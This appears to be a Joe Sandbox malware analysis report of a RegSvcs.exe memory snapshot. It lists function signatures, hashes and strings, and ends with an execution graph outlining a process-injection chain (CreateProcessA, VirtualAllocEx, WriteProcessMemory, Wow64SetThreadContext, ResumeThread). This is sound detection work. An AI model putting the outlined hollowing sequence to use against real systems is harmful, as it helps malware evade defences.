                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsnlen
                                                                                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                              • API String ID: 3628947076-1387797911
                                                                                                              • Opcode ID: 8e9c88890228433f81bc3a068b258f14d4438cdec781e6b2f7487dd1b19265b6
                                                                                                              • Instruction ID: 799c5b744a2aaa5ae52b7fad17fc1a166522e490108acd10c830239fc11ddfe8
                                                                                                              • Opcode Fuzzy Hash: 8e9c88890228433f81bc3a068b258f14d4438cdec781e6b2f7487dd1b19265b6
                                                                                                              • Instruction Fuzzy Hash: BA41A57634420DBAEB419AE0CD42FEFB76C9F84B94F104212BB04DA191DBB0DA5597A4
                                                                                                              Function 009A13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 7799e3756c3b78c5b80334204a5b6031cd27e8b091e70b2c1ba46d889a844bed
                                                                                                              • Instruction ID: d879e83517b3f3d126c6df0bbfd8705b8ffc1b0881864d2359acf6bd7a1ac842
                                                                                                              • Opcode Fuzzy Hash: 7799e3756c3b78c5b80334204a5b6031cd27e8b091e70b2c1ba46d889a844bed
                                                                                                              • Instruction Fuzzy Hash: 076103B1D04655AACF24CF9DC8908BEBBF9EFDA300B14C52DF4DA47581D634AA40CBA1
                                                                                                              Function 00A03B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 6342eb14114cb6ea41f00017e684ef544a0f8222ea7dc3caf99f0517fb102e2e
                                                                                                              • Instruction ID: eef352a6707f5a1e8173a21024d5e4f814b4d73f5eb97129f5fa28d84debfdd5
                                                                                                              • Opcode Fuzzy Hash: 6342eb14114cb6ea41f00017e684ef544a0f8222ea7dc3caf99f0517fb102e2e
                                                                                                              • Instruction Fuzzy Hash: 4461A073900648ABDF24DF99D9804BE7BF9EF54314B14C52AF8A9E7181E234EB449B50
                                                                                                              Function 00997EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 009B3F12
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 009B3F4A
                                                                                                              • ExecuteOptions, xrefs: 009B3F04
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 009BE345
                                                                                                              • Execute=1, xrefs: 009B3F5E
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 009B3EC4
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 009B3F75
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 009BE2FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BaseDataModuleQuery
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 3901378454-484625025
                                                                                                              • Opcode ID: db32db6baede02c2e565a3b8b459afd0a2d5d78389a53bc95882657aca4a6fb7
                                                                                                              • Instruction ID: 7a69b355055750f92f70f5466f43de415494cd57ffab34227f6691891217434f
                                                                                                              • Opcode Fuzzy Hash: db32db6baede02c2e565a3b8b459afd0a2d5d78389a53bc95882657aca4a6fb7
                                                                                                              • Instruction Fuzzy Hash: A341D971A8060D7ADF20DB94DCCAFEAB3BCAB94714F0005A9B105F6081EA70EB458F71
                                                                                                              Function 009A0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __fassign
                                                                                                              • String ID: .$:$:
                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                              • Instruction ID: 19c1ec905c210dba7371f8f66241b5c283b271470cc11a27a5b371000b011617
                                                                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                              • Instruction Fuzzy Hash: 17A19E71D0030AEFDF24CF64C8457BEB7B8AF96314F24856AD892A7282D7349A41CBD1
                                                                                                              Function 009A0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C2206
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-4236105082
                                                                                                              • Opcode ID: 2fdd6a20e395bda0fb9ae5ae99df20b9864aa2bbd5de9e0ee5ed67ccf3c25f90
                                                                                                              • Instruction ID: ee8ff7339e75f96c011b71acd0b669d87ac322bb7a2df781e91eaa2576f67882
                                                                                                              • Opcode Fuzzy Hash: 2fdd6a20e395bda0fb9ae5ae99df20b9864aa2bbd5de9e0ee5ed67ccf3c25f90
                                                                                                              • Instruction Fuzzy Hash: DC514631B442016FEB15CB19CC82FA633ADAFD5720F25822DFD59DB286DA35EC418B91
                                                                                                              Function 009A14C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___swprintf_l.LIBCMT ref: 009CEA22
                                                                                                                • Part of subcall function 009A13CB: ___swprintf_l.LIBCMT ref: 009A146B
                                                                                                                • Part of subcall function 009A13CB: ___swprintf_l.LIBCMT ref: 009A1490
                                                                                                              • ___swprintf_l.LIBCMT ref: 009A156D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: bf408b586b2424854d2e25ff2059d0e630e318ce4dc58a086a32b8496d037699
                                                                                                              • Instruction ID: 4b0e5b8423cbd801a9ffbf5b61b07a893185394e5eef05ecac15c206bb4a008e
                                                                                                              • Opcode Fuzzy Hash: bf408b586b2424854d2e25ff2059d0e630e318ce4dc58a086a32b8496d037699
                                                                                                              • Instruction Fuzzy Hash: F0219172D00219AFCF21DE98CC41BEAB3ACAB95710F444565FC46D3140DB74EA588BE1
                                                                                                              Function 00A03DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: 9fbc7f5824646c9e9f31b6bbb8a65f5e3e032b911f0981fee609a0b51c3d231b
                                                                                                              • Instruction ID: c10770c47f35957305082f598bbe6cf4ce0882cd361280ebdfe653a25cb52b0c
                                                                                                              • Opcode Fuzzy Hash: 9fbc7f5824646c9e9f31b6bbb8a65f5e3e032b911f0981fee609a0b51c3d231b
                                                                                                              • Instruction Fuzzy Hash: FF21BD7790021AABCF20AF69E9419EF77EC9B54754F040621FC08D3281E7789E4487E1
                                                                                                              Function 009853A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009C22F4
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 009C230B
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009C22FC
                                                                                                              • RTL: Re-Waiting, xrefs: 009C2328
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-871070163
                                                                                                              • Opcode ID: 4fb87f34b410594d901478e7fd91d4e8e9d8e5739116e207f172a2db5380423f
                                                                                                              • Instruction ID: b041027db05407bc7f7ad35f2c5f81615f61308bca5b523902f5e54c67f0ff89
                                                                                                              • Opcode Fuzzy Hash: 4fb87f34b410594d901478e7fd91d4e8e9d8e5739116e207f172a2db5380423f
                                                                                                              • Instruction Fuzzy Hash: AE515671A00701ABEB15EB28CC81FA7339CAFD5760F11422AFD19CB281EA74EC4587E0
                                                                                                              Function 0098EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 009C248D
                                                                                                              • RTL: Re-Waiting, xrefs: 009C24FA
                                                                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009C24BD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                              • API String ID: 0-3177188983
                                                                                                              • Opcode ID: ea6d2248df0375a06848bee3cf2ecb441571b865c640ec386e8ab47a86b1c9d5
                                                                                                              • Instruction ID: 16abb3a5f17846f9f0263899611f7746e4d1ad7d111184efa7103692e4948e63
                                                                                                              • Opcode Fuzzy Hash: ea6d2248df0375a06848bee3cf2ecb441571b865c640ec386e8ab47a86b1c9d5
                                                                                                              • Instruction Fuzzy Hash: D041E670A00204ABD724EFA9CC99FAB77A8EFC5720F208A19F5559B3D1D734E94187A1
                                                                                                              Function 0099FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __fassign
                                                                                                              • String ID:
                                                                                                              • API String ID: 3965848254-0
                                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                              • Instruction ID: 37ec77aa07be603a98bbf8bb6b77a1d0c5034cb92a9936484ba851af09907f86
                                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                              • Instruction Fuzzy Hash: 41919F72D0420AEBDF24CF9CC855BEEB7B8EF55305F24847AD452E61A2E7304A41CB91
                                                                                                              Function 00A15CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: $$0
                                                                                                              • API String ID: 1302938615-389342756
                                                                                                              • Opcode ID: 687b2076dfd4c6d69d8b784d010a4eb8a2b0894f138c7bcbb6a2030e78babaec
                                                                                                              • Instruction ID: c65049436c6ccddcc461761e7d33385b8ffa2ca63cebd8f7bc9348a57c336168
                                                                                                              • Opcode Fuzzy Hash: 687b2076dfd4c6d69d8b784d010a4eb8a2b0894f138c7bcbb6a2030e78babaec
                                                                                                              • Instruction Fuzzy Hash: 5E919030D04A9ADFDF25CFB9D4453EDBBB1AF81310F18465AD4A1A72D1C7748A82CB54

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:21%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:76
                                                                                                              Total number of Limit Nodes:2
                                                                                                              execution_graph 9356 5c6e7f 9359 5c8c30 9356->9359 9357 5c6e8e 9360 5c8c4a 9359->9360 9361 5c8c52 9360->9361 9373 5c969d 9360->9373 9377 5c8f81 9360->9377 9382 5c9620 9360->9382 9386 5c9424 9360->9386 9390 5c92c4 9360->9390 9394 5c93e9 9360->9394 9399 5c9128 9360->9399 9403 5c9488 9360->9403 9408 5c91cd 9360->9408 9413 5c9a93 9360->9413 9418 5c94de 9360->9418 9361->9357 9422 5c6580 9373->9422 9426 5c6578 9373->9426 9374 5c96cb 9374->9361 9379 5c8fc3 9377->9379 9378 5c9b02 9378->9361 9379->9378 9430 5c6918 9379->9430 9384 5c6578 WriteProcessMemory 9382->9384 9385 5c6580 WriteProcessMemory 9382->9385 9383 5c9644 9383->9361 9384->9383 9385->9383 9434 5c6458 9386->9434 9438 5c6450 9386->9438 9387 5c9442 9391 5c92dc 9390->9391 9442 5c6238 9391->9442 9392 5c90c2 9392->9361 9396 5c9404 9394->9396 9395 5c97a8 9397 5c6578 WriteProcessMemory 9396->9397 9398 5c6580 WriteProcessMemory 9396->9398 9397->9395 9398->9395 9400 5c9142 9399->9400 9401 5c90c2 9400->9401 9402 5c6238 ResumeThread 9400->9402 9401->9361 9402->9401 9404 5c949d 9403->9404 9446 5c6328 9404->9446 9450 5c6321 9404->9450 9405 5c94b8 9405->9361 9409 5c9405 9408->9409 9411 5c6578 WriteProcessMemory 9409->9411 9412 5c6580 WriteProcessMemory 9409->9412 9410 5c97a8 9411->9410 9412->9410 9415 5c904b 9413->9415 9414 5c9b02 9414->9361 9415->9414 9417 5c6918 CreateProcessA 9415->9417 9416 5c9097 9416->9361 9417->9416 9454 5c66d9 9418->9454 9458 5c66e0 9418->9458 9419 5c90c2 9419->9361 9423 5c65cc WriteProcessMemory 9422->9423 9425 5c666b 9423->9425 9425->9374 9427 5c6584 WriteProcessMemory 9426->9427 9429 5c666b 9427->9429 9429->9374 9431 5c699f CreateProcessA 9430->9431 9433 5c6bfd 9431->9433 9433->9433 9435 5c649c VirtualAllocEx 9434->9435 9437 5c651a 9435->9437 9437->9387 9439 5c649c VirtualAllocEx 9438->9439 9441 5c651a 9439->9441 9441->9387 9443 5c627c ResumeThread 9442->9443 9445 5c62ce 9443->9445 9445->9392 9447 5c6371 Wow64SetThreadContext 9446->9447 9449 5c63ef 9447->9449 9449->9405 9451 5c6371 Wow64SetThreadContext 9450->9451 9453 5c63ef 9451->9453 9453->9405 9455 5c672c ReadProcessMemory 9454->9455 9457 5c67aa 9455->9457 9457->9419 9459 5c672c ReadProcessMemory 9458->9459 9461 5c67aa 9459->9461 9461->9419 9462 1dae00 9463 1dae4d VirtualProtect 9462->9463 9464 1daebf 9463->9464

                                                                                                              Executed Functions

                                                                                                              Function 005C6918 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 249 5c6918-5c69b1 251 5c69fa-5c6a22 249->251 252 5c69b3-5c69ca 249->252 255 5c6a68-5c6abe 251->255 256 5c6a24-5c6a38 251->256 252->251 257 5c69cc-5c69d1 252->257 266 5c6b04-5c6bfb CreateProcessA 255->266 267 5c6ac0-5c6ad4 255->267 256->255 264 5c6a3a-5c6a3f 256->264 258 5c69f4-5c69f7 257->258 259 5c69d3-5c69dd 257->259 258->251 261 5c69df 259->261 262 5c69e1-5c69f0 259->262 261->262 262->262 265 5c69f2 262->265 268 5c6a41-5c6a4b 264->268 269 5c6a62-5c6a65 264->269 265->258 285 5c6bfd-5c6c03 266->285 286 5c6c04-5c6ce9 266->286 267->266 275 5c6ad6-5c6adb 267->275 270 5c6a4d 268->270 271 5c6a4f-5c6a5e 268->271 269->255 270->271 271->271 274 5c6a60 271->274 274->269 276 5c6add-5c6ae7 275->276 277 5c6afe-5c6b01 275->277 279 5c6ae9 276->279 280 5c6aeb-5c6afa 276->280 277->266 279->280 280->280 281 5c6afc 280->281 281->277 285->286 298 5c6cf9-5c6cfd 286->298 299 5c6ceb-5c6cef 286->299 301 5c6d0d-5c6d11 298->301 302 5c6cff-5c6d03 298->302 299->298 300 5c6cf1 299->300 300->298 304 5c6d21-5c6d25 301->304 305 5c6d13-5c6d17 301->305 302->301 303 5c6d05 302->303 303->301 307 5c6d5b-5c6d66 304->307 308 5c6d27-5c6d50 304->308 305->304 306 5c6d19 305->306 306->304 312 5c6d67 307->312 308->307 312->312
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 005C6BDF
                                                                                                              Memory Dump Source
